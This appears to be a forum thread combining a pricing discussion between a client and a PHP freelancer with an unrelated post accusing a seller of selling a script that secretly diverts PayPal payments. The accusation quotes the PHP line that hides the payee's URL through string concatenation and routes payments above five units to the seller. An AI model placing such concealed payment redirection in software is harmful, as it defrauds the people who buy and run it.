    Hi,
    I'm considering hiring someone for a fairly simple php jon. My question to you is, can you quote me for a job (if I describe it well), and stick to that quote? I know how dev can run overtime, but if I hire someone on a qoute, I expect them to stick to it.

    Donny

    Hi Donny, thanks for the reply. I have been in business for 1 and a half years, it's not long but still long enough for me to learn what I should ask for to make a modest profit and at the same time not ripping my clients off - basically reasonable pricing.

    People are smart. Most marketers just don't get it and keep doing things that will not pay off because they think people are as stupid as they are. I believe the only way to succeed is to make my customers happy and keep them coming back to me.

    Sticking to a quote is just one of my ways to do it. Actually my quotes are not cheap because 1) it helps me stick to it. 2) I want to keep only the higher end clients with me who want quality. My time is precious. Clients who pay well are often much easier to deal with - to whom I am willing to dedicate my time.

    This user CHARM HTML should be banned ASAP

    I purchased a script from him, and the script includes a hidden code, that sends some payments to his paypal account

    when I contact him
    I got this reply:

    "Thought you could mess with our system, huh?"

    This software contains an internal code that redirects paypal payment the the sellers page. This is 100% warez tactic and this person is scamming me as a buyer by giving me a script that will accept payments , by redirecting some payments to his own account.

    code found in the script:

    if ($cost > 5) {$kay_site = 'ht'.'tp:/'.'/w3e'.'c.com';} else {$kay_site = KAY_SITE;}

    $title .= 'You are buying word "'.$word.'" ... ';

    As you can guess www.w3ec.com is that account of this "charming" scammer.
